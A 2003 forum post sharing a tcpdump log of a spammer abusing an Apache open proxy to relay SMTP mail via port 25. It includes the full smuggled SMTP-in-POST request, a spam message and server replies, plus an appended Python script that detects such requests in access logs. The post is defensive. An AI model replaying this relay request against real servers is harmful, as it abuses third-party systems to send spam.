
Web server: Apache hack by spammer



Houser
27.05.2003, 14:32
A spammer apparently tried, via an HTTP POST request to an Apache server I know of, to send mail via localhost.
The IP address has been changed to "ip".
The source was apparently a server hoster in America.
Here are excerpts from the tcpdump log file (mail addresses removed).
Looks to me like a scripted attack.
The interesting part is the redirection to port 25 ...
Tip: block port 25 from DMZ web servers immediately

POST http://ip:25/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 1572
Host:
HELO
MAIL FROM:
RCPT TO:
RCPT TO:
RCPT TO:
RCPT TO:
DATA
Message-ID: [ID filtered]
To:
Cc:
From:
Subject: 4761everybody is eligable to save money
Date: Sun, 25 May 2003 xx:xx:xx -0500
MIME-Version: 1.0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><!-- d cnyrtmavi lvpgqptwr --><P ALIGN=3DCENTER><!-- t nkzikdu aqefeck=
h--><FONT SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
0"><!-- o ninsw-->FREE CASH GRANTS FOR YOU<BR>
<BR>
<P ALIGN=3DLEFT><!-- g wuyksltxc lzycpykbf sqoug--></FONT><!-- g zinsoo rsh=
ker --><FONT COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR:=
#ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
0"><!-- v jnjkj ygclx w-->If you own a car then you have to look in to our =
extended auto warranties. We cover everything so you don`t have to worry a=
bout it anymore. Mechanics are too expensive and can take weeks to fix you=
r car. We work with certified dealers to get your car back fast.
So see hat we have to offer.<BR>
<BR>
<A HREF=3D"http://www.hardgomera.org">Get a free quote now</A></P><!-- i pc=
sorwbt ttpfnic--></P><!-- e xabihcf ejd--></FONT><!-- c verygjeo vcadfplb n=
yjs--></HTML><!-- i bwlxqsw ejs-->

.
QUIT
Date: Sun, 25 May 2003 xx:xx:xx GMT
X-Cache: MISS from
Transfer-Encoding: chunked
Content-Type: text/plain; charset=iso-8859-1
978
500 5.5.1 Command unrecognized: "POST / HTTP/1.1"
500 5.5.1 Command unrecognized: "Host: ip:25"
500 5.5.1 Command unrecognized: "Content-length: 1572"
500 5.5.1 Command unrecognized: "Content-type: application/octet-stream"
500 5.5.1 Command unrecognized: "Connection: close"
500 5.5.1 Command unrecognized: ""
250 Hello ip, pleased to meet you
250 2.1.0 ... Sender ok
250 2.1.5 ... Recipient ok
250 2.1.5 ... Recipient ok
250 2.1.5 ... Recipient ok
250 2.1.5 ... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 h4PFIOI27034 Message accepted for delivery
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
421 4.7.0 Too many bad commands; closing connection
Date: Sun, 25 May 2003 xx:xx:xx GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
202
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>502 Proxy Error</TITLE>
</HEAD><BODY>
<H1>Proxy Error</H1>
The proxy server received an invalid
response from an upstream server.<P>
The proxy server could not handle the request <EM><A HREF="ip:25/">POST ip:25/</A></EM>.<P>
Reason: <STRONG>Could not connect to
remote machine: Connection refused</STRONG><P>
<HR>
<ADDRESS>Apache/1.3.27 Server at ipPort 80</ADDRESS>
</BODY></HTML>
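An added example, not from the original post or its author: a Python check over constructed Apache access-log lines that flags forward-proxy style requests (absolute URI or CONNECT) whose target port is not 80/443, which is exactly the "POST http://ip:25/" pattern in the dump above. The IPs, hosts and log lines are constructed; the log format assumed is Apache "combined".

```python
import re
from urllib.parse import urlsplit

# Apache "combined" log format; the request line is captured whole in 'req'.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
WEB_PORTS = {80, 443}

# Constructed sample log: a spam-relay attempt like the one in the dump
# (proxying POST to port 25), a normal page hit, and a CONNECT to port 25.
SAMPLE_LOG = [
    '203.0.113.9 - - [25/May/2003:10:18:24 -0500] "POST http://192.0.2.10:25/ HTTP/1.1" 200 978',
    '203.0.113.9 - - [25/May/2003:10:18:25 -0500] "POST http://192.0.2.10:25/ HTTP/1.1" 502 522',
    '198.51.100.4 - - [25/May/2003:10:19:01 -0500] "GET /index.html HTTP/1.0" 200 2326',
    '203.0.113.9 - - [25/May/2003:10:20:11 -0500] "CONNECT 192.0.2.10:25 HTTP/1.0" 200 -',
]


def classify(line):
    """Return (client, target_host, target_port, reason) when the request is a
    proxy-style request to a non-web port, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("req").split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    if method == "CONNECT":
        # CONNECT carries a bare host:port authority.
        host, _, port = target.rpartition(":")
        port = int(port) if port.isdigit() else 443
    elif "://" in target:
        # Absolute URI: only a forward proxy is asked to fetch these.
        u = urlsplit(target)
        if u.hostname is None:
            return None
        host, port = u.hostname, (u.port or (443 if u.scheme == "https" else 80))
    else:
        return None  # origin-form request for the server's own content
    if port in WEB_PORTS:
        return None
    return (m.group("client"), host, port, f"{method} via proxy to port {port}")


def find_relay_attempts(lines):
    """All lines that look like the proxy being pointed at a mail (or other non-web) port."""
    return [hit for hit in map(classify, lines) if hit]
```

Hits on port 25 from an outside client are a strong sign the server is acting as an open forward proxy; the fix on the Apache side is to leave ProxyRequests off unless a proxy is actually intended.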